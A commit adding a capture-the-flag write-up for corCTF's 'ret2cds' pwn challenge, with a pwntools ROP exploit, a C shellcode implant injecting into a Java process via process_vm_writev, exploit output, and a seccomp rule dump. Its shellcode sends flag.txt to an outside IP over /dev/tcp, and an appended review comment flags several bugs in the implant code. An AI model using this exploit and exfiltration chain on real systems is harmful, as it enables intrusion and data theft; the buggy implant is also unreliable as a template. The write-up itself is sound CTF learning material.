2021: corctf: ret2cds

This commit is contained in:
xenia 2021-08-23 23:40:55 -04:00
parent 01b330f7d1
commit f80d51be40
20 changed files with 3119 additions and 0 deletions

2021/corctf/ret2cds/.gitignore vendored Normal file

@ -0,0 +1,2 @@
implant.bin
implant.elf


@ -0,0 +1,519 @@
# ret2cds
by [haskal](https://awoo.systems)
pwn / 497 pts / 6 solves
>Pwners keep joking about dropping socat and xinetd 0 days so I rewrote netcat in java. I dare you
>to pop a shell on me now :^)
>
>https://ret2cds.be.ax/
>
>NOTE: Internet is enabled, please use the provided qemu image, and note that this has been tested to
>work in a Debian environment for the Docker host. An Ubuntu host is known to have issues with the
>official solution for the challenge. If you are on Debian, the docker deployment should work for you
>if you don't want to use the qemu image (but not guaranteed).
>
>QEMU Image: ret2cds-qemu.qcow2.gz
>
>QEMU Example: qemu-system-x86_64 -enable-kvm -serial mon:stdio -hda ret2cds.qcow2 -nographic -smp 1
>-m 1G -net user,hostfwd=tcp::1337-:1337 -net nic
>
>QEMU Username: root (no password)
>
>Docker: ret2cds.tar
provided files (i'm only providing the binaries here not the whole qemu image cause that is huge):
[ret2cds/](ret2cds/)
## solution
pwn time
basic analysis of the binary shows that it is using seccomp (also, there is seccomp on the docker
image used for the challenge, but the binary's seccomp rules are much more restrictive)
here's the main function in the dragn
![main function, it's literally just a 512 byte read into a 256 byte buffer](main.png)
yea
ok so first let's get the seccomp rules. for this i used
<https://github.com/david942j/seccomp-tools> and just like, had it run the binary, (yes i probably
shouldn't be running CTF binaries on my actual machine but shush)
this produces output [analysis/ret2cds-seccomp.txt](analysis/ret2cds-seccomp.txt). well... most
things are banned
so what isn't banned? since the docker contains its own seccomp config, we cross-reference what is
allowed there with what is banned here and find 2 interesting calls which are allowed by both sets
of configurations
- `process_vm_readv`
- `process_vm_writev`
these are syscalls that allow reading and writing another process's memory given we have ptrace
permission (in docker everything is root, and also the docker config explicitly adds the ptrace
capability, so yes)
## initial pwning
ok we'll get to this later. first we need to bonk the ret2cds process. it's pretty standard just
write the address of write in order to leak the libc base, then jump back to main, then make a
second rop chain to call mmap in libc
well this part got kind of weird, because pwntools ROP could not identify a good gadget to get
control of r9 which was needed to be set to 0 since it's the offset parameter for mmap (r8 garbage
is OK, it gets ignored for anonymous maps by the kernel). so i turn to my trusty uber-ROP gadget
which is `setcontext` (it's a libc call for restoring all registers from a struct on the stack, goes
with `getcontext`). by manual analysis there is a good place to jump into `setcontext` in order to
get control of r9
```asm
// ( in setcontext )
001581e1 4c 8b 4a 30 MOV R9,qword ptr [RDX + 0x30]
001581e5 48 8b 92 MOV RDX,qword ptr [RDX + 0x88]
88 00 00 00
001581ec 31 c0 XOR EAX,EAX
001581ee c3 RET
```
for this we just need `RDX` to be loaded as a pointer to the memory we want to load from, which is
easy cause we have gadgets for `RDX`. we pass in a pointer to some random part of `rodata` such that
the address `r9` gets loaded from ends up being `0`
here's the code so far
```python
elf = ELF("./ret2cds")
rop = ROP(elf)
rop.write(1, elf.got['write'])
libc = ELF("./libc.so.6")
r = remote("ret2cds.be.ax", 38255)
r.recvuntil("warden: ")
# step 1: get write to print the address of write, then go back to main (0x0040123a)
r.sendline(b"A"*256 + b"AAAAAAAA" + rop.chain() + p64(0x0040123a))
print(r.recvline())
print(r.recvline())
leak = r.recvline()[1:8]
leak = u64(leak.ljust(8, b'\x00'))
print(hex(leak))
libc_base = leak - libc.symbols['write']
print(hex(libc_base))
libc.address = libc_base
# now, make part of the ROP for mmap with pwntools
libc_rop = ROP(libc)
# memorize these args lol, that's
# - addr
# - size
# - 7: PROT_READ | PROT_WRITE | PROT_EXECUTE
# - 0x32: MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE
# - -1: no fd
# - 0: no offset
libc_rop.mmap(0x133713370000, 0x10000, 7, 0x32) #, -1, 0)
# read moar shellcode into it
libc_rop.read(0, 0x133713370000, 0x10000)
# handle those pesky remaining args (well, just the last one)
# see the assembly for this gadget above
fucky_r9_gadget = p64(0x581e1 + libc_base)
# load rdx with a pointer to rodata (convenient source of 0x0s) offset so that r9 gets
pre_rop = ROP(libc)
pre_rop.rdx = 0x402008 - 0x30
# send step 2 exploit, then jump to the shellcode we just mapped
r.sendline(b"A"*256 + b"AAAAAAAA" + pre_rop.chain() + fucky_r9_gadget + libc_rop.chain() + p64(0x133713370000))
```
now we have shellcode. but there's still seccomp.....
we can produce the final shellcode tho. it just won't work yet because execve is not allowed
(neither is like, anything bash would be running here)
```python
stage3 = asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {}))
```
please note: if you are doing CTFs in the future referencing this writeup, make sure to keep the IP
address `44.44.127.10` so that i get yr flags >:3
ok so the path should be clear: use `process_vm_writev` in order to write _more shellcode_ into
_another process_
the only other process is the java netcat replacement
yikes,
the java code itself is not that interesting, and not exploitable as far as i can tell. if you're
interested, you can take a look in [Bytecode Viewer](https://github.com/Konloch/bytecode-viewer) or
[JDA](https://github.com/LLVM-but-worse/java-disassembler)[^1]
from looking at that quickly on the qemu environment, we find something interesting in
`/proc/<pid>/maps` for the java process
```
800000000-800002000 rwxp 00001000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa
800002000-8003b9000 rw-p 00003000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa
8003b9000-800a95000 r--p 003ba000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa
800a95000-800a96000 rw-p 00a96000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa
800a96000-8010a3000 r--p 00a97000 fe:00 3441489 /usr/lib/jvm/java-11-openjdk-amd64/lib/server/classes.jsa
```
`classes.jsa` has an `rwx` mapping at what looks like a fixed address... that's a great target for
shellcode[^2]
i'm not super interested in shellcoding a call to `process_vm_writev` ... would be convenient to
write it in C, but i also don't have or want to have (legitimate or illegitimate) a binja license
for their shellcode compiler...
## how 2 make a C implant 2021 tutorial working (no robux)
set it to 136 bpm
make a linker script. it's gonna start at the address where your `mmap` shellcode page is
```ld
ENTRY(_start)
MEMORY
{
RAM (rwx) : ORIGIN = 0x133713370000, LENGTH = 0x10000
}
SECTIONS
{
.text :
{
*(.text.start)
*(.text*)
}
.rodata :
{
*(.rodata*)
}
.data :
{
*(.data*)
}
.bss :
{
_bss = .;
*(.bss*)
*(COMMON)
_ebss = .;
}
}
```
now make a makefile (for convenience). we want to call gcc with the magic spell `-nostdlib
-nodefaultlibs -nostdinc -fpic -fno-stack-protector -Os -T stage2.ld`
basically that's
- don't use any stdlib or standard headers
- make position independent code, skip the stack protector
- optimize for size
- use the given linker script
then objcopy that into a flat binary
```make
.PHONY: all clean copy
CC=gcc
OBJCOPY=objcopy
all: implant.bin
clean:
$(RM) *.bin *.elf
implant.bin: implant.elf
$(OBJCOPY) -O binary $< $@
implant.elf: stage2.c stage2.ld
$(CC) -nostdlib -nodefaultlibs -nostdinc -T stage2.ld -fpic -fno-stack-protector \
-Os -std=gnu11 -Wall -Wextra -o $@ $<
```
add some reverb, and stack the layers
here's some boilerplate C. fun fact, your entrypoint just needs to be at the beginning and it needs
to wipe `.bss` then jump to main. but we also need to redefine literally everything because we opted
to not have any standard headers (this is technically unnecessary, you can use the headers if you
want)
```c
typedef unsigned char uint8_t;
_Static_assert(sizeof(uint8_t) == 1, "uint8_t wrong size");
typedef unsigned short uint16_t;
_Static_assert(sizeof(uint16_t) == 2, "uint16_t wrong size");
typedef unsigned int uint32_t;
_Static_assert(sizeof(uint32_t) == 4, "uint32_t wrong size");
typedef unsigned long long uint64_t;
_Static_assert(sizeof(uint64_t) == 8, "uint64_t wrong size");
typedef unsigned int size_t;
typedef int ssize_t;
#define NULL ((void*)0x0)
#define pid_t unsigned long
#define true 1
#define false 0
#define SYS_exit 1
#define SYS_read 0
#define SYS_write 1
#define SYS_process_vm_readv 310
#define SYS_process_vm_writev 311
int main();
void __attribute__((noreturn)) exit(int);
void* memset(void* dst, int val, size_t size) {
for (size_t i = 0; i < size; i++) {
((uint8_t*)dst)[i] = val;
}
return dst;
}
void* memcpy(void* dst, const void* src, size_t size) {
for (size_t i = 0; i < size; i++) {
((uint8_t*)dst)[i] = ((uint8_t*)src)[i];
}
return dst;
}
extern uint8_t _bss;
extern uint8_t _ebss;
void __attribute__((noreturn)) __attribute__((section(".text.start"))) _start() {
// wipe .bss
memset(&_bss, 0, (&_ebss) - (&_bss));
// go to main!
exit(main());
}
int main() {
// your code here!!!
while(true){}
return 120;
}
```
ok now that's done, write some syscall wrappers (i'm being very extra with this)
```c
ssize_t read(int _fd, void* _buf, size_t _len) {
register int fd asm("rdi") = _fd;
register void* buf asm("rsi") = _buf;
register size_t len asm("rdx") = _len;
register int syscall asm("rax") = SYS_read;
register ssize_t ret asm("rax");
asm volatile("syscall" : "=r"(ret) : "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory");
return ret;
}
void write(int _fd, const void* _buf, size_t _len) {
register int fd asm("rdi") = _fd;
register const void* buf asm("rsi") = _buf;
register size_t len asm("rdx") = _len;
register int syscall asm("rax") = SYS_write;
asm volatile("syscall" :: "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory");
}
void __attribute__((noreturn)) exit(int _code) {
register int code asm("rdi") = _code;
register int syscall asm("rax") = SYS_exit;
asm volatile("syscall" :: "r"(code), "r"(syscall) : "memory");
__builtin_unreachable();
}
ssize_t process_vm_readv(pid_t _pid,
const struct iovec *_local_iov,
unsigned long _liovcnt,
const struct iovec *_remote_iov,
unsigned long _riovcnt,
unsigned long _flags) {
register pid_t pid asm("rdi") = _pid;
register struct iovec* local_iov asm("rsi") = _local_iov;
register unsigned long liovcnt asm("rdx") = _liovcnt;
register struct iovec* remote_iov asm("r10") = _remote_iov;
register unsigned long riovcnt asm("r8") = _riovcnt;
register unsigned long flags asm("r9") = _flags;
register int syscall asm("rax") = SYS_process_vm_readv;
register ssize_t ret asm("rax");
asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov),
"r"(riovcnt), "r"(flags), "r"(syscall) : "memory");
return ret;
}
ssize_t process_vm_writev(pid_t _pid,
const struct iovec *_local_iov,
unsigned long _liovcnt,
const struct iovec *_remote_iov,
unsigned long _riovcnt,
unsigned long _flags) {
register pid_t pid asm("rdi") = _pid;
register struct iovec* local_iov asm("rsi") = _local_iov;
register unsigned long liovcnt asm("rdx") = _liovcnt;
register struct iovec* remote_iov asm("r10") = _remote_iov;
register unsigned long riovcnt asm("r8") = _riovcnt;
register unsigned long flags asm("r9") = _flags;
register int syscall asm("rax") = SYS_process_vm_writev;
register ssize_t ret asm("rax");
asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov),
"r"(riovcnt), "r"(flags), "r"(syscall) : "memory");
return ret;
}
```
ok _now_ we're ready to send the shellcode using `process_vm_writev`
## how 2 iovec 2021 tutorial working (no robux)
so if you've never seen iovecs (first of all you should try kernel pwn, you'll definitely see
iovecs,) basically it's a way to read and/or write multiple addresses in sequence with one syscall.
you pass in an array of these structs
```c
struct iovec {
void *iov_base; /* Starting address */
size_t iov_len; /* Number of bytes to transfer */
};
```
that's how `process_vm_readv` and `process_vm_writev` are working
now there's one more small detail, which is that we don't know what PID java has. luckily it's low
(usually <10) so we can just spray the shellcode at every process and eventually java will be hit
```c
// this is: asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/35.237.4.96/1337"], {}))
char* buf = "shellcode here";
char buf2[0x2000];
// write to the previously determined rwx pages in the java process
struct iovec remote_vec = { (void*)0x800000000, 0x2000 };
// read from a local shellcode buf
struct iovec local_vec = { &buf2[0], 0x2000 };
int main() {
print("implant is booted\n");
// fill nop sled (0x90 is NOP)
memset(buf2, 0x90, 0x2000);
// add the shellcode at the end
memcpy(&buf2[0x2000 - 186], buf, 186);
for (int i = 2; i < 100; i++) {
print("sending to pid:");
print_int(i);
print("\n");
ssize_t ret = process_vm_writev(i, &local_vec, 1, &remote_vec, 1, 0);
if (ret <= 0) {
print("bad ret!: ");
print_int(-ret);
print("\n");
} else {
print("GOOD RET\n");
break;
}
}
print("injection complete\n");
while(true){}
return 120;
}
```
finally you'll probably need to connect to the endpoint again, in order to trigger the java process
to enter the rwx page and execute your shellcode
the results:
```
python3 exploit.py
[*] '.../ret2cds'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x3ff000)
RUNPATH: b'./'
[*] Loaded 14 cached gadgets for '../challenge/chall/ret2cds'
0x0000: 0x40131b pop rdi; ret
0x0008: 0x1 [arg0] rdi = 1
0x0010: 0x401319 pop rsi; pop r15; ret
0x0018: 0x403fc0 [arg1] rsi = got.write
0x0020: b'iaaajaaa' <pad r15>
0x0028: 0x401030 write
[*] '.../libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
0x111040
[+] Opening connection to ret2cds.be.ax on port 34485: Done
b'\x00\n'
b"lol, you ain't escaping...\n"
0x7f5b8856e040
0x7f5b8845d000
[*] Loaded 200 cached gadgets for '../challenge/chall/libc.so.6'
0x0000: 0x7f5b8856256d pop rdx; pop rcx; pop rbx; ret
0x0008: 0x7 [arg2] rdx = 7
0x0010: 0x32 [arg3] rcx = 50
0x0018: b'gaaahaaa' <pad rbx>
0x0020: 0x7f5b88484529 pop rsi; ret
0x0028: 0x10000 [arg1] rsi = 65536
0x0030: 0x7f5b88483b72 pop rdi; ret
0x0038: 0x133713370000 [arg0] rdi = 21127266500608
0x0040: 0x7f5b88578890 mmap
0x0048: 0x7f5b885791e1 pop rdx; pop r12; ret
0x0050: 0x10000 [arg2] rdx = 65536
0x0058: b'waaaxaaa' <pad r12>
0x0060: 0x7f5b88484529 pop rsi; ret
0x0068: 0x133713370000 [arg1] rsi = 21127266500608
0x0070: 0x7f5b88483b72 pop rdi; ret
0x0078: 0x0 [arg0] rdi = 0
0x0080: 0x7f5b8856dfa0 read
b'm%V\x88[\x7f\x00\x00\x07\x00\x00\x00\x00\x00\x00\x002\x00\x00\x00\x00\x00\x00\x00gaaahaaa)EH\x88[\x7f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00r;H\x88[\x7f\x00\x00\x00\x007\x137\x13\x00\x00\x90\x88W\x88[\x7f\x00\x00\xe1\x91W\x88[\x7f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00waaaxaaa)
EH\x88[\x7f\x00\x00\x00\x007\x137\x13\x00\x00r;H\x88[\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xdfV\x88[\x7f\x00\x00'
make: Nothing to be done for 'all'.
[*] Switching to interactive mode
🚨 Due to the recent security breaches, we have no choice but to lock you up in jail! 🚨
And just to avoid all those socat/xinetd 0-days you and your pwn friends brag about...
I rewrote netcat in Java ☕.
Nothing can go wrong with a language used on over 13 billion devices ™.
\x00nter your appeal to the warden: \x00
lol, you ain't escaping...
\x00[*] Got EOF while reading in interactive
$
[*] Closed connection to ret2cds.be.ax port 34485
[*] Got EOF while sending in interactive
```
meanwhile on yr listening server
```
$ while true; do nc -vlp 1337; done
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 161.35.128.177.
Ncat: Connection from 161.35.128.177:43098.
corctf{r0p_t0_5h3llc0d3_t0_pWn1n1g_j@v@_rwX_cDs_af179e546321dfac13370}
```
(idk what the 'cds' part of the challege name is supposed to mean. return to 💿?)
[^1]: JDA is just a cleaned up and slightly prettified fork of Bytecode Viewer, but it's also behind
Bytecode Viewer in terms of a few features (mainly Android)
[^2]: in recent versions of openjdk, this is no longer the case (i think). sad :(
luckily this challenge is using an older version
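Review bot: the syscall wrappers in the C implant (read, write, exit, process_vm_readv, process_vm_writev) never tell the compiler that the `syscall` instruction clobbers rcx and r11, so any value the compiler keeps live in those registers across the call is silently corrupted; add them to every clobber list, e.g. `asm volatile("syscall" : "=r"(ret) : "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "rcx", "r11", "memory");`. Three smaller defects in the same block are worth fixing before anyone reuses it as a template: `#define SYS_exit 1` is the x86-64 number for write (exit is 60), which only goes unnoticed because `main` never returns; `typedef unsigned int size_t;` and `typedef int ssize_t;` make both types 32-bit on a 64-bit target, so the kernel reads the 8-byte `iov_len` of `struct iovec` across 4 bytes of padding and the initializers only work because static objects are zero-filled (use `unsigned long` / `long`); and `struct iovec` first appears inside the wrapper prototypes before its definition, so if the snippets are assembled in the order written the parameter-scope struct is a distinct type from the one defined in the iovec section and the calls in `main` will not compile (declare the struct before the wrappers). The spray loop also calls `print` and `print_int`, which are not defined anywhere in the writeup.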


@ -0,0 +1,651 @@
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x01 0x00 0xc000003e if (A == ARCH_X86_64) goto 0003
0002: 0x06 0x00 0x00 0x00000000 return KILL
0003: 0x20 0x00 0x00 0x00000000 A = sys_number
0004: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0006
0005: 0x06 0x00 0x00 0x00000000 return KILL
0006: 0x15 0x00 0x01 0x00000002 if (A != open) goto 0008
0007: 0x06 0x00 0x00 0x00000000 return KILL
0008: 0x15 0x00 0x01 0x00000003 if (A != close) goto 0010
0009: 0x06 0x00 0x00 0x00000000 return KILL
0010: 0x15 0x00 0x01 0x00000004 if (A != stat) goto 0012
0011: 0x06 0x00 0x00 0x00000000 return KILL
0012: 0x15 0x00 0x01 0x00000005 if (A != fstat) goto 0014
0013: 0x06 0x00 0x00 0x00000000 return KILL
0014: 0x15 0x00 0x01 0x00000006 if (A != lstat) goto 0016
0015: 0x06 0x00 0x00 0x00000000 return KILL
0016: 0x15 0x00 0x01 0x00000007 if (A != poll) goto 0018
0017: 0x06 0x00 0x00 0x00000000 return KILL
0018: 0x15 0x00 0x01 0x00000008 if (A != lseek) goto 0020
0019: 0x06 0x00 0x00 0x00000000 return KILL
0020: 0x15 0x00 0x01 0x0000000c if (A != brk) goto 0022
0021: 0x06 0x00 0x00 0x00000000 return KILL
0022: 0x15 0x00 0x01 0x0000000d if (A != rt_sigaction) goto 0024
0023: 0x06 0x00 0x00 0x00000000 return KILL
0024: 0x15 0x00 0x01 0x0000000e if (A != rt_sigprocmask) goto 0026
0025: 0x06 0x00 0x00 0x00000000 return KILL
0026: 0x15 0x00 0x01 0x0000000f if (A != rt_sigreturn) goto 0028
0027: 0x06 0x00 0x00 0x00000000 return KILL
0028: 0x15 0x00 0x01 0x00000010 if (A != ioctl) goto 0030
0029: 0x06 0x00 0x00 0x00000000 return KILL
0030: 0x15 0x00 0x01 0x00000011 if (A != pread64) goto 0032
0031: 0x06 0x00 0x00 0x00000000 return KILL
0032: 0x15 0x00 0x01 0x00000012 if (A != pwrite64) goto 0034
0033: 0x06 0x00 0x00 0x00000000 return KILL
0034: 0x15 0x00 0x01 0x00000013 if (A != readv) goto 0036
0035: 0x06 0x00 0x00 0x00000000 return KILL
0036: 0x15 0x00 0x01 0x00000014 if (A != writev) goto 0038
0037: 0x06 0x00 0x00 0x00000000 return KILL
0038: 0x15 0x00 0x01 0x00000015 if (A != access) goto 0040
0039: 0x06 0x00 0x00 0x00000000 return KILL
0040: 0x15 0x00 0x01 0x00000016 if (A != pipe) goto 0042
0041: 0x06 0x00 0x00 0x00000000 return KILL
0042: 0x15 0x00 0x01 0x00000017 if (A != select) goto 0044
0043: 0x06 0x00 0x00 0x00000000 return KILL
0044: 0x15 0x00 0x01 0x00000018 if (A != sched_yield) goto 0046
0045: 0x06 0x00 0x00 0x00000000 return KILL
0046: 0x15 0x00 0x01 0x00000019 if (A != mremap) goto 0048
0047: 0x06 0x00 0x00 0x00000000 return KILL
0048: 0x15 0x00 0x01 0x0000001a if (A != msync) goto 0050
0049: 0x06 0x00 0x00 0x00000000 return KILL
0050: 0x15 0x00 0x01 0x0000001b if (A != mincore) goto 0052
0051: 0x06 0x00 0x00 0x00000000 return KILL
0052: 0x15 0x00 0x01 0x0000001c if (A != madvise) goto 0054
0053: 0x06 0x00 0x00 0x00000000 return KILL
0054: 0x15 0x00 0x01 0x0000001d if (A != shmget) goto 0056
0055: 0x06 0x00 0x00 0x00000000 return KILL
0056: 0x15 0x00 0x01 0x0000001e if (A != shmat) goto 0058
0057: 0x06 0x00 0x00 0x00000000 return KILL
0058: 0x15 0x00 0x01 0x0000001f if (A != shmctl) goto 0060
0059: 0x06 0x00 0x00 0x00000000 return KILL
0060: 0x15 0x00 0x01 0x00000020 if (A != dup) goto 0062
0061: 0x06 0x00 0x00 0x00000000 return KILL
0062: 0x15 0x00 0x01 0x00000021 if (A != dup2) goto 0064
0063: 0x06 0x00 0x00 0x00000000 return KILL
0064: 0x15 0x00 0x01 0x00000022 if (A != pause) goto 0066
0065: 0x06 0x00 0x00 0x00000000 return KILL
0066: 0x15 0x00 0x01 0x00000023 if (A != nanosleep) goto 0068
0067: 0x06 0x00 0x00 0x00000000 return KILL
0068: 0x15 0x00 0x01 0x00000024 if (A != getitimer) goto 0070
0069: 0x06 0x00 0x00 0x00000000 return KILL
0070: 0x15 0x00 0x01 0x00000025 if (A != alarm) goto 0072
0071: 0x06 0x00 0x00 0x00000000 return KILL
0072: 0x15 0x00 0x01 0x00000026 if (A != setitimer) goto 0074
0073: 0x06 0x00 0x00 0x00000000 return KILL
0074: 0x15 0x00 0x01 0x00000027 if (A != getpid) goto 0076
0075: 0x06 0x00 0x00 0x00000000 return KILL
0076: 0x15 0x00 0x01 0x00000028 if (A != sendfile) goto 0078
0077: 0x06 0x00 0x00 0x00000000 return KILL
0078: 0x15 0x00 0x01 0x00000029 if (A != socket) goto 0080
0079: 0x06 0x00 0x00 0x00000000 return KILL
0080: 0x15 0x00 0x01 0x0000002a if (A != connect) goto 0082
0081: 0x06 0x00 0x00 0x00000000 return KILL
0082: 0x15 0x00 0x01 0x0000002b if (A != accept) goto 0084
0083: 0x06 0x00 0x00 0x00000000 return KILL
0084: 0x15 0x00 0x01 0x0000002c if (A != sendto) goto 0086
0085: 0x06 0x00 0x00 0x00000000 return KILL
0086: 0x15 0x00 0x01 0x0000002d if (A != recvfrom) goto 0088
0087: 0x06 0x00 0x00 0x00000000 return KILL
0088: 0x15 0x00 0x01 0x0000002e if (A != sendmsg) goto 0090
0089: 0x06 0x00 0x00 0x00000000 return KILL
0090: 0x15 0x00 0x01 0x0000002f if (A != recvmsg) goto 0092
0091: 0x06 0x00 0x00 0x00000000 return KILL
0092: 0x15 0x00 0x01 0x00000030 if (A != shutdown) goto 0094
0093: 0x06 0x00 0x00 0x00000000 return KILL
0094: 0x15 0x00 0x01 0x00000031 if (A != bind) goto 0096
0095: 0x06 0x00 0x00 0x00000000 return KILL
0096: 0x15 0x00 0x01 0x00000032 if (A != listen) goto 0098
0097: 0x06 0x00 0x00 0x00000000 return KILL
0098: 0x15 0x00 0x01 0x00000033 if (A != getsockname) goto 0100
0099: 0x06 0x00 0x00 0x00000000 return KILL
0100: 0x15 0x00 0x01 0x00000034 if (A != getpeername) goto 0102
0101: 0x06 0x00 0x00 0x00000000 return KILL
0102: 0x15 0x00 0x01 0x00000035 if (A != socketpair) goto 0104
0103: 0x06 0x00 0x00 0x00000000 return KILL
0104: 0x15 0x00 0x01 0x00000036 if (A != setsockopt) goto 0106
0105: 0x06 0x00 0x00 0x00000000 return KILL
0106: 0x15 0x00 0x01 0x00000037 if (A != getsockopt) goto 0108
0107: 0x06 0x00 0x00 0x00000000 return KILL
0108: 0x15 0x00 0x01 0x00000038 if (A != clone) goto 0110
0109: 0x06 0x00 0x00 0x00000000 return KILL
0110: 0x15 0x00 0x01 0x00000039 if (A != fork) goto 0112
0111: 0x06 0x00 0x00 0x00000000 return KILL
0112: 0x15 0x00 0x01 0x0000003a if (A != vfork) goto 0114
0113: 0x06 0x00 0x00 0x00000000 return KILL
0114: 0x15 0x00 0x01 0x0000003b if (A != execve) goto 0116
0115: 0x06 0x00 0x00 0x00000000 return KILL
0116: 0x15 0x00 0x01 0x0000003d if (A != wait4) goto 0118
0117: 0x06 0x00 0x00 0x00000000 return KILL
0118: 0x15 0x00 0x01 0x0000003e if (A != kill) goto 0120
0119: 0x06 0x00 0x00 0x00000000 return KILL
0120: 0x15 0x00 0x01 0x0000003f if (A != uname) goto 0122
0121: 0x06 0x00 0x00 0x00000000 return KILL
0122: 0x15 0x00 0x01 0x00000040 if (A != semget) goto 0124
0123: 0x06 0x00 0x00 0x00000000 return KILL
0124: 0x15 0x00 0x01 0x00000041 if (A != semop) goto 0126
0125: 0x06 0x00 0x00 0x00000000 return KILL
0126: 0x15 0x00 0x01 0x00000042 if (A != semctl) goto 0128
0127: 0x06 0x00 0x00 0x00000000 return KILL
0128: 0x15 0x00 0x01 0x00000043 if (A != shmdt) goto 0130
0129: 0x06 0x00 0x00 0x00000000 return KILL
0130: 0x15 0x00 0x01 0x00000044 if (A != msgget) goto 0132
0131: 0x06 0x00 0x00 0x00000000 return KILL
0132: 0x15 0x00 0x01 0x00000045 if (A != msgsnd) goto 0134
0133: 0x06 0x00 0x00 0x00000000 return KILL
0134: 0x15 0x00 0x01 0x00000046 if (A != msgrcv) goto 0136
0135: 0x06 0x00 0x00 0x00000000 return KILL
0136: 0x15 0x00 0x01 0x00000047 if (A != msgctl) goto 0138
0137: 0x06 0x00 0x00 0x00000000 return KILL
0138: 0x15 0x00 0x01 0x00000048 if (A != fcntl) goto 0140
0139: 0x06 0x00 0x00 0x00000000 return KILL
0140: 0x15 0x00 0x01 0x00000049 if (A != flock) goto 0142
0141: 0x06 0x00 0x00 0x00000000 return KILL
0142: 0x15 0x00 0x01 0x0000004a if (A != fsync) goto 0144
0143: 0x06 0x00 0x00 0x00000000 return KILL
0144: 0x15 0x00 0x01 0x0000004b if (A != fdatasync) goto 0146
0145: 0x06 0x00 0x00 0x00000000 return KILL
0146: 0x15 0x00 0x01 0x0000004c if (A != truncate) goto 0148
0147: 0x06 0x00 0x00 0x00000000 return KILL
0148: 0x15 0x00 0x01 0x0000004d if (A != ftruncate) goto 0150
0149: 0x06 0x00 0x00 0x00000000 return KILL
0150: 0x15 0x00 0x01 0x0000004e if (A != getdents) goto 0152
0151: 0x06 0x00 0x00 0x00000000 return KILL
0152: 0x15 0x00 0x01 0x0000004f if (A != getcwd) goto 0154
0153: 0x06 0x00 0x00 0x00000000 return KILL
0154: 0x15 0x00 0x01 0x00000050 if (A != chdir) goto 0156
0155: 0x06 0x00 0x00 0x00000000 return KILL
0156: 0x15 0x00 0x01 0x00000051 if (A != fchdir) goto 0158
0157: 0x06 0x00 0x00 0x00000000 return KILL
0158: 0x15 0x00 0x01 0x00000052 if (A != rename) goto 0160
0159: 0x06 0x00 0x00 0x00000000 return KILL
0160: 0x15 0x00 0x01 0x00000053 if (A != mkdir) goto 0162
0161: 0x06 0x00 0x00 0x00000000 return KILL
0162: 0x15 0x00 0x01 0x00000054 if (A != rmdir) goto 0164
0163: 0x06 0x00 0x00 0x00000000 return KILL
0164: 0x15 0x00 0x01 0x00000055 if (A != creat) goto 0166
0165: 0x06 0x00 0x00 0x00000000 return KILL
0166: 0x15 0x00 0x01 0x00000056 if (A != link) goto 0168
0167: 0x06 0x00 0x00 0x00000000 return KILL
0168: 0x15 0x00 0x01 0x00000057 if (A != unlink) goto 0170
0169: 0x06 0x00 0x00 0x00000000 return KILL
0170: 0x15 0x00 0x01 0x00000058 if (A != symlink) goto 0172
0171: 0x06 0x00 0x00 0x00000000 return KILL
0172: 0x15 0x00 0x01 0x00000059 if (A != readlink) goto 0174
0173: 0x06 0x00 0x00 0x00000000 return KILL
0174: 0x15 0x00 0x01 0x0000005a if (A != chmod) goto 0176
0175: 0x06 0x00 0x00 0x00000000 return KILL
0176: 0x15 0x00 0x01 0x0000005b if (A != fchmod) goto 0178
0177: 0x06 0x00 0x00 0x00000000 return KILL
0178: 0x15 0x00 0x01 0x0000005c if (A != chown) goto 0180
0179: 0x06 0x00 0x00 0x00000000 return KILL
0180: 0x15 0x00 0x01 0x0000005d if (A != fchown) goto 0182
0181: 0x06 0x00 0x00 0x00000000 return KILL
0182: 0x15 0x00 0x01 0x0000005e if (A != lchown) goto 0184
0183: 0x06 0x00 0x00 0x00000000 return KILL
0184: 0x15 0x00 0x01 0x0000005f if (A != umask) goto 0186
0185: 0x06 0x00 0x00 0x00000000 return KILL
0186: 0x15 0x00 0x01 0x00000061 if (A != getrlimit) goto 0188
0187: 0x06 0x00 0x00 0x00000000 return KILL
0188: 0x15 0x00 0x01 0x00000062 if (A != getrusage) goto 0190
0189: 0x06 0x00 0x00 0x00000000 return KILL
0190: 0x15 0x00 0x01 0x00000063 if (A != sysinfo) goto 0192
0191: 0x06 0x00 0x00 0x00000000 return KILL
0192: 0x15 0x00 0x01 0x00000064 if (A != times) goto 0194
0193: 0x06 0x00 0x00 0x00000000 return KILL
0194: 0x15 0x00 0x01 0x00000065 if (A != ptrace) goto 0196
0195: 0x06 0x00 0x00 0x00000000 return KILL
0196: 0x15 0x00 0x01 0x00000066 if (A != getuid) goto 0198
0197: 0x06 0x00 0x00 0x00000000 return KILL
0198: 0x15 0x00 0x01 0x00000067 if (A != syslog) goto 0200
0199: 0x06 0x00 0x00 0x00000000 return KILL
0200: 0x15 0x00 0x01 0x00000068 if (A != getgid) goto 0202
0201: 0x06 0x00 0x00 0x00000000 return KILL
